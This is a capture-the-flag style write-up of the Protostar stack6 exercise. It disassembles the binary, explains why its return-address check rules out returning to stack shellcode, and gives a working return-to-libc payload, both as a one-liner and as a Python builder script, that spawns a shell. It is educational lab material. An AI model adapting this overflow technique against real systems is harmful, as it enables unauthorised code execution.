Exploit Exercises - Protostar Stack 6

It is free time, so I had some time to play exploit-exercises. Today I play at stack level 6. I learned something new from it: return-to-libc.

Start with gdb and disassemble main and getpath:

# gdb -q /opt/protostar/bin/stack6

(gdb) disas main
Dump of assembler code for function main:
0x080484fa <main+0>:     push   %ebp
0x080484fb <main+1>:     mov    %esp,%ebp
0x080484fd <main+3>:     and    $0xfffffff0,%esp
0x08048500 <main+6>:     call   0x8048484 <getpath>
0x08048505 <main+11>:    mov    %ebp,%esp
0x08048507 <main+13>:    pop    %ebp
0x08048508 <main+14>:    ret
End of assembler dump.

(gdb) disas getpath
Dump of assembler code for function getpath:
0x08048484 <getpath+0>:    push   %ebp
0x08048485 <getpath+1>:    mov    %esp,%ebp
0x08048487 <getpath+3>:    sub    $0x68,%esp
0x0804848a <getpath+6>:    mov    $0x80485d0,%eax
0x0804848f <getpath+11>:   mov    %eax,(%esp)
0x08048492 <getpath+14>:   call   0x80483c0 <printf@plt>
0x08048497 <getpath+19>:   mov    0x8049720,%eax
0x0804849c <getpath+24>:   mov    %eax,(%esp)
0x0804849f <getpath+27>:   call   0x80483b0 <fflush@plt>
0x080484a4 <getpath+32>:   lea    -0x4c(%ebp),%eax
0x080484a7 <getpath+35>:   mov    %eax,(%esp)
0x080484aa <getpath+38>:   call   0x8048380 <gets@plt>
0x080484af <getpath+43>:   mov    0x4(%ebp),%eax
0x080484b2 <getpath+46>:   mov    %eax,-0xc(%ebp)
0x080484b5 <getpath+49>:   mov    -0xc(%ebp),%eax
0x080484b8 <getpath+52>:   and    $0xbf000000,%eax
0x080484bd <getpath+57>:   cmp    $0xbf000000,%eax
0x080484c2 <getpath+62>:   jne    0x80484e4 <getpath+96>
0x080484c4 <getpath+64>:   mov    $0x80485e4,%eax
0x080484c9 <getpath+69>:   mov    -0xc(%ebp),%edx
0x080484cc <getpath+72>:   mov    %edx,0x4(%esp)
0x080484d0 <getpath+76>:   mov    %eax,(%esp)
0x080484d3 <getpath+79>:   call   0x80483c0 <printf@plt>
0x080484d8 <getpath+84>:   movl   $0x1,(%esp)
0x080484df <getpath+91>:   call   0x80483a0 <_exit@plt>
0x080484e4 <getpath+96>:   mov    $0x80485f0,%eax
0x080484e9 <getpath+101>:  lea    -0x4c(%ebp),%edx
0x080484ec <getpath+104>:  mov    %edx,0x4(%esp)
0x080484f0 <getpath+108>:  mov    %eax,(%esp)
0x080484f3 <getpath+111>:  call   0x80483c0 <printf@plt>
0x080484f8 <getpath+116>:  leave
0x080484f9 <getpath+117>:  ret
End of assembler dump.

Set two breakpoints: one at the call to getpath in main (0x08048500) and one at getpath+116 (0x080484f8), the leave just before getpath returns to main with the overflowed return address:

(gdb) info breakpoints
Num     Type           Disp Enb Address    What
1       breakpoint     keep y   0x08048500 in main at stack6/stack6.c:27
        breakpoint already hit 1 time
2       breakpoint     keep y   0x080484f8 in getpath at stack6/stack6.c:23
        breakpoint already hit 1 time

Now generate the payload. The Metasploit pattern tools (pattern_create / pattern_offset) give a padding of 80 bytes, and the disassembly agrees: the buffer handed to gets() starts at -0x4c(%ebp), so 0x4c = 76 bytes reach the saved EBP and 80 bytes reach the saved return address.

python -c 'print "A"*80+ "BBBB"'

The process crashes with EIP pointing to 0x42424242: control of EIP is done!

When you review the source code (or getpath+43 to getpath+91 above), you will see that after gets() the function reads its own saved return address from 0x4(%ebp), masks it with 0xbf000000 and compares; if the result is 0xbf000000, i.e. the return address points into the stack (0xbfxxxxxx), it prints an error message with that address and calls _exit(1). So returning directly into shellcode on the stack is blocked, and to exploit it you need return-to-libc: libc lives at 0xb7xxxxxx, which passes the check. Note that only the saved return address at 0x4(%ebp) is checked; the other dwords you write (the fake return address for system() and its argument pointer) may contain any value. Many tutorials use ROP here; I think it is not needed.

Get the function addresses in gdb (the Protostar VM has no ASLR, so the libc addresses are the same outside gdb):

(gdb) p system

(gdb) p exit

This is the payload layout. system() is entered through a ret, so the dword after its address is the return address it will use when it finishes (exit(), for a clean exit instead of a crash), and the dword after that is its first argument, a pointer to the "/bin/sh" string:

| "A"*80 to fill | system() address | exit() address | /bin/sh address |

One way to supply the string is an environment variable: export SHELL2='/bin/sh', then find the address of that environment string on the stack and add 7 (len("SHELL2=") = 7) so the pointer skips the name and lands on the value.

Use the (...; cat) | stack6 trick to hold the shell after it opens: cat keeps stdin open, otherwise the spawned shell reads EOF and exits immediately.

With the environment variable, the PoC is the same command as the final one below, only the third dword is the address of the SHELL2 value (environment address + 7) instead of a string carried in the payload.

Then I decided to carry /bin/sh in the PoC itself instead, so I put it at the end of the payload, right after the three addresses; it lands on the stack just behind the fake frame, and gets() replaces the trailing newline from print with the NUL that terminates the string:

| "A"*80 to fill | system() address | exit() address | /bin/sh address | /bin/sh string |

Find the string's address by dumping the stack in gdb at the getpath+116 breakpoint. The address in gdb is not the one in the real run, because gdb changes the environment and shifts the stack; on this VM add 0x30 to the gdb address to get the real one. That offset depends on the environment size, so if the shell does not spawn, this pointer is the first thing to re-check. The address 0xbffff6c8 starts with 0xbf, but it sits in the argument slot, not in the checked return address, so the check does not fire.

This is the PoC:

(python -c 'print "A"*80+"\xb0\xff\xec\xb7"+"\xc0\x60\xec\xb7"+"\xc8\xf6\xff\xbf"+"/bin/sh"';cat) | /opt/protostar/bin/stack6
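As an added example (my own script, not code from the original post), here is the same ret2libc payload built programmatically: the padding is derived from the -0x4c(%ebp) buffer offset instead of guessed, the addresses are packed little-endian instead of reversed by hand, the return address is checked against the same 0xbf000000 mask getpath applies, and a small helper gives the +7 for the SHELL2 environment-variable variant. The three addresses are the ones found on the Protostar VM above and only hold there (no ASLR); the function names are my own.

```python
# Added example (not from the original post): ret2libc payload builder for
# Protostar stack6. Runs under Python 2 and 3. The three addresses below were
# found on the Protostar VM (no ASLR) and are an assumption anywhere else.
import struct
import sys

SYSTEM_ADDR = 0xb7ecffb0   # (gdb) p system
EXIT_ADDR   = 0xb7ec60c0   # (gdb) p exit
BINSH_ADDR  = 0xbffff6c8   # "/bin/sh" on the stack outside gdb (gdb dump + 0x30)


def padding_from_frame(buffer_offset=0x4c):
    """Bytes from the start of the gets() buffer to the saved return address.

    getpath passes -0x4c(%ebp) to gets(), so 0x4c bytes reach the saved EBP and
    four more reach the saved EIP: 80 in total.
    """
    return buffer_offset + 4


def p32(value):
    """Pack a 32-bit address little-endian (the post reversed the bytes by hand)."""
    return struct.pack("<I", value)


def passes_getpath_check(ret):
    """Mirror of getpath's guard on the saved return address:
        and $0xbf000000,%eax ; cmp $0xbf000000,%eax ; jne <ok>
    Returns True when getpath would NOT bail out with _exit(1)."""
    return (ret & 0xbf000000) != 0xbf000000


def env_value_addr(var_addr, name):
    """Environment-variable variant: the value of NAME=... starts len(NAME)+1
    bytes after the start of the "NAME=" string (the +7 for SHELL2 in the post)."""
    return var_addr + len(name) + 1


def build_payload(system=SYSTEM_ADDR, exit_=EXIT_ADDR, binsh=BINSH_ADDR,
                  padding=None, binsh_string=b"/bin/sh"):
    """[padding][system][fake return address for system = exit][arg: ptr to "/bin/sh"]

    binsh_string, if not None, is appended so the string lands on the stack
    right behind the chain; gets() turns the trailing newline into its NUL.
    Only the first dword (read back from 4(%ebp)) is subject to the 0xbf
    check, which is why a 0xbf... pointer in the argument slot is fine."""
    if padding is None:
        padding = padding_from_frame()
    if not passes_getpath_check(system):
        raise ValueError("return address 0x%08x would be rejected by getpath" % system)
    chain = b"A" * padding + p32(system) + p32(exit_) + p32(binsh)
    if binsh_string is not None:
        chain += binsh_string
    return chain


def binsh_offset(padding=None):
    """Offset of the appended "/bin/sh" from the start of the buffer (80 + 3*4 = 92);
    useful when reading the gdb stack dump to locate the string."""
    if padding is None:
        padding = padding_from_frame()
    return padding + 3 * 4


if __name__ == "__main__":
    # Usage on the VM: (python exploit.py; cat) | /opt/protostar/bin/stack6
    out = getattr(sys.stdout, "buffer", sys.stdout)
    out.write(build_payload() + b"\n")
```

The only address that is not a libc symbol is the /bin/sh pointer; it depends on the stack layout (environment, argv, how the binary is launched), so if the shell does not appear, re-dump the stack and adjust BINSH_ADDR before touching anything else.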

----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Windows and Cisco Lab
To be continued; I will update more.

Nam Habach